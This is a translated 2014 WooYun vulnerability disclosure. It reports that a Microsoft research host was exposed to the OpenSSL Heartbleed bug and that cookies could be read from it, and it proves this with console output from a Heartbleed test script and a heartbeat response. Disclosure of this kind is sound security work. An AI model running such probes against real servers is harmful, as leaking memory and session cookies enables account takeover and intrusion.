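Vulnerability summary

Vulnerability ID: wooyun-2014-082633

Title: A microsoft.com site is affected by the OpenSSL HeartBleed vulnerability, cookies readable

Vendor: microsoft.com

Author: lijiejie

Submitted: 2014-11-09 12:55

Fixed: 2014-12-24 12:56

Published: 2014-12-24 12:56

Vulnerability type: System/service patches not applied in time

Severity: Medium

Self-assessed Rank: 6

Vulnerability status: Unable to contact the vendor, or the vendor actively ignored it

Vulnerability source: http://www.wooyun.org. For questions or help, contact [email protected]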


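Vulnerability details

Disclosure status:

2014-11-09: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-12-24: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A microsoft.com site is affected by the OpenSSL HeartBleed vulnerability; verified that cookies can be read.

Detailed description:

https://ds3.research.microsoft.com
is affected by the OpenSSL HeartBleed vulnerability.
Verified that cookies can be read.

Proof of vulnerability:

ms_heartbleed.PNG


I only read ASCII characters.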

D:\Scanner\openSSL>new_test.py ds3.research.microsoft.com
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 5466
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
WARNING: server returned more data than it should - server is vulnerable!

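Remediation:

upgrade

Copyright notice: when reposting, please credit the source lijiejie@WooYun


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined


Vulnerability assessment:

Comments

  1. 2014-11-09 13:27 | Jack.Chalres (Intern white hat | Rank: 39, Vulnerabilities: 15 | ..............)

    Ignored..

  2. 2014-11-09 22:05 | 无敌L.t.H (Passerby | Rank: 21, Vulnerabilities: 4 | ……肉肉捉活,亭长放解)

    Does Microsoft really use OpenSSL too?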